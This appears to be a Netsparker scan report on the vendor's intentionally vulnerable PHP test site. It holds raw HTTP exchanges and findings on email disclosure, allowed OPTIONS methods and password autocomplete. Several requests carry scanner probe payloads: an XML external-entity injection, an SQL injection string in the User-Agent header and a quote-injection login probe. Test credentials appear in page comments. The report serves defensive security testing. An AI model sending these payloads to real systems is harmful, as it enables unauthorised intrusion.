<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search" >
<form method="get" action="artist.php">
…
GET /auth/style.css HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 8888
Last-Modified: Tue, 11 Feb 2020 14:14:32 GMT
Accept-Ranges: bytes
Content-Type: text/css
Date: Mon, 13 Jul 2020 07:04:56 GMT
ETag: "e3000000013083-22b8-59e4d798f793b"
body {
margin: 0;
padding: 0;
background: #F1F1F1 url(images/img01.gif) repeat-x left top;
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #787878;
}
h1, h2, h3 {
margin: 0;
padding: 0;
font-weight: normal;
color: #023848;
}
h2 {
color: red;
}
h3{
color: Gray;
}
h1 {
font-size: 2em;
}
h2 {
font-size: 2.4em;
}
h3 {
font-size: 1.6em;
}
p, ul, ol {
margin-top: 0;
line-height: 180%;
}
ul, ol {
}
a {
text-decoration: none;
color: #4486C7;
}
a:hover {
}
#wrapper {
width: 980px;
margin: 0 auto;
padding: 0;
}
#header {
width: 980px;
height: 280px;
margin: 0 auto;
padding: 0px;
background: url(images/main-slideshow-no-flash.jpg) no-repeat left top;
}
#logo {
float: right;
margin: 0;
padding: 0;
color: #000000;
}
#logo h1, #logo p {
margin: 0;
padding: 0;
}
#logo h1 {
float: left;
padding-top: 223px;
letter-spacing: -1px;
text-align: right;
text-transform: lowercase;
font-size: 3.8em;
}
#logo p {
float: left;
margin: 0;
padding: 250px 0 0 10px;
font: normal 14px Georgia, "Times New Roman", Times, serif;
font-style: italic;
color: #FFFFFF;
}
#logo a {
border: none;
background: none;
text-decoration: none;
color: #FFFFFF;
}
#search {
float: right;
width: 280px;
height: 60px;
padding: 20px 0px 0px 0px;
background: #E2E2E2;
border-bottom: 4px solid #FFFFFF;
}
#search form {
height: 41px;
margin: 0;
padding: 10px 0 0 20px;
}
#search fieldset {
margin: 0;
padding: 0;
border: none;
}
#search-text {
width: 170px;
padding: 6px 5px 2px 5px;
border: 1px solid #DEDEDE;
background: #FFFFFF;
text
…
GET /function.mysql-connect HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php?file=Generics/about.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 404 Not Found
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 13 Jul 2020 07:04:53 GMT
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /function.mysql-connect was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Win32) PHP/5.2.6 Server at php.testsparker.com Port 80</address>
</body></html>
GET /Generics/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 0
Last-Modified: Tue, 11 Feb 2020 14:14:32 GMT
Accept-Ranges: bytes
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
ETag: "960000000191b3-0-59e4d798bb6f6"
GET /images/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 0
Last-Modified: Tue, 11 Feb 2020 14:14:32 GMT
Accept-Ranges: bytes
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:54 GMT
ETag: "320000000199c2-0-59e4d798f9c4b"
GET /nslookup.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3954
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><script type=text/javascript src = "" ></script>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="#">Products </a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<form action="/nslookup.php" method="POST">
<table class="databases">
<tr>
<td colspan="3">
</td>
</tr>
<tr>
<td class="label" style="width: 89px">
<label>IP Adress:</label></td>
<td class="style3">
<input type="text" size="40" name="param" id="param" class="input"/>
</td>
<td class="style1">
<input type="submit" value="GO
…
GET /process.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 1422
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>
<div id="resetbar">
This website is automatically reset at every midnight (00:00 - UTC).
</div>
<div id="footer">
<p>Copyright (c) 2010 testsparker.com. All rights reserved. Design by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a>.</p>
</div> <!-- end #footer -->
</body>
</html>
POST /process.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 1422
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:05:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>
<div id="resetbar">
This website is automatically reset at every midnight (00:00 - UTC).
</div>
<div id="footer">
<p>Copyright (c) 2010 testsparker.com. All rights reserved. Design by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a>.</p>
</div> <!-- end #footer -->
</body>
</html>
GET /products.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2809
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><script type=text/javascript src = "" ></script>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<div class="entry">
<h1 class="title"><a href="#">Products </a></h1>
<p>Currently , we don't have any products to sell.</p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search" >
<form method="get" action="artist.php">
<div>
<input type="text" name="id" id="search-text" value="" />
<input type="submit" id="search-submit" value="GO" />
</div>
</form>
</div>
<div style="clear: both;"> </div>
</li>
<li>
<h2>Tags</h2>
<p>netsparker xss web-application-security false-positive-fr
…
GET /style.css HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 9414
Last-Modified: Tue, 11 Feb 2020 14:14:32 GMT
Accept-Ranges: bytes
Content-Type: text/css
Date: Mon, 13 Jul 2020 07:04:53 GMT
ETag: "4f000000013047-24c6-59e4d7993b4ee"
/*
Design by Free CSS Templates
*/
/*
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License
*/
body {
margin: 0;
padding: 0;
background: #F1F1F1 url(images/img01.gif) repeat-x left top;
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #787878;
}
h1, h2, h3 {
margin: 0;
padding: 0;
font-weight: normal;
color: #023848;
}
h2 {
color: red;
}
h3{
color: Gray;
}
h1 {
font-size: 2em;
}
h2 {
font-size: 2.4em;
}
h3 {
font-size: 1.6em;
}
p, ul, ol {
margin-top: 0;
line-height: 180%;
}
ul, ol {
}
a {
text-decoration: none;
color: #4486C7;
}
a:hover {
}
#wrapper {
width: 980px;
margin: 0 auto;
padding: 0;
}
#header {
width: 980px;
height: 280px;
margin: 0 auto;
padding: 0px;
background: url(images/main-slideshow-no-flash.jpg) no-repeat left top;
}
#logo {
float: right;
margin: 0;
padding: 0;
color: #000000;
}
#logo h1, #logo p {
margin: 0;
padding: 0;
}
#logo h1 {
float: left;
padding-top: 223px;
letter-spacing: -1px;
text-align: right;
text-transform: lowercase;
font-size: 3.8em;
}
#logo p {
float: left;
margin: 0;
padding: 250px 0 0 10px;
font: normal 14px Georgia, "Times New Roman", Times, serif;
font-style: italic;
color: #FFFFFF;
}
#logo a {
border: none;
background: none;
text-decoration: none;
color: #FFFFFF;
}
#search {
float: right;
width: 280px;
height: 60px;
padding: 20px 0px 0px 0px;
background: #E2E2E2;
border-bottom: 4px solid #FFFFFF;
}
#search form {
height: 41px;
margin: 0;
padding: 10px 0 0 20px;
}
#search fieldset {
margin: 0;
paddin
…
X-XSS-Protection: 1; mode=block
WASC | 15 |
Netsparker identified an Email Address Disclosure.
Method | Parameter | Value |
---|---|---|
GET | file | Generics/contact.nsp |
GET /process.php?file=Generics/contact.nsp HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3483
Content-Type: text/html
Date: Mon, 13 Jul 20
…Stone QX
Dos Tringulas
EK7 AP0<br />
USA<br />
</p>
<p>
<span>Tel: +44 123 456 7890</span><br />
<span>Fax: +44 123 456 7891</span></p>
<p>
<p>
E-mail: test@testsparker.com</b></a></p>
</p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search"
…
WASC | 13 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.3 (Medium) |
Environmental | 5.3 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.3 (Medium) |
Environmental | 5.3 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Netsparker detected that OPTIONS
method is allowed. This issue is reported as extra information.
OPTIONS /.svn/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Allow: GET,HEAD,POST,OPTIONS,TRACE
Keep-Alive: timeout=5, max=103
Content-Length: 0
Content-Type: httpd/unix-directory
Date: Mon, 13 Jul 2020 07:08:52 GMT
OPTIONS /auth/images/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Allow: GET,HEAD,POST,OPTIONS,TRACE
Keep-Alive: timeout=5, max=26
Content-Length: 0
Content-Type: httpd/unix-directory
Date: Mon, 13 Jul 2020 07:08:20 GMT
OPTIONS /Generics/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Allow: GET,HEAD,POST,OPTIONS,TRACE
Keep-Alive: timeout=5, max=135
Content-Length: 0
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:07:03 GMT
OPTIONS /icons/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Allow: GET,HEAD,POST,OPTIONS,TRACE
Keep-Alive: timeout=5, max=122
Content-Length: 0
Content-Type: httpd/unix-directory
Date: Mon, 13 Jul 2020 07:10:32 GMT
OPTIONS /icons/small/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/icons/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Allow: GET,HEAD,POST,OPTIONS,TRACE
Keep-Alive: timeout=5, max=103
Content-Length: 0
Content-Type: httpd/unix-directory
Date: Mon, 13 Jul 2020 07:11:39 GMT
OPTIONS /images/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Connection: Keep-Alive
Allow: GET,HEAD,POST,OPTIONS,TRACE
Keep-Alive: timeout=5, max=119
Content-Length: 0
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:07:39 GMT
OPTIONS
method in all production systems.WASC | 14 |
Netsparker detected that autocomplete is enabled in one or more of the password fields.
If user chooses to save, data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.
Method | Parameter | Value |
---|---|---|
GET | User-Agent | (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
GET /auth/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=4
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="23577">
<br/>
<input type="submit" value="SUBMIT">
</form>
…
Method | Parameter | Value |
---|---|---|
POST | username | %27 |
POST | token | 30556 |
POST | password |
POST /auth/control.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
username=%2527&token=30556&password=
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=27
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:07:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="26775">
<br/>
<input type="submit" value="SUBMIT">
</form>
…
Method | Parameter | Value |
---|---|---|
GET | User-Agent | (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
GET /auth/control.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/login.php
User-Agent: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=40
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:08:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="18806">
<br/>
<input type="submit" value="SUBMIT">
</form>
…
GET /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7; path=/
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 3161
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="2544">
<br/>
<input type="submit" value="SUBMIT">
</form>
…
POST /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 124
Content-Type: application/xml
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="14285">
<br/>
<input type="submit" value="SUBMIT">
</form>
…
Method | Parameter | Value |
---|---|---|
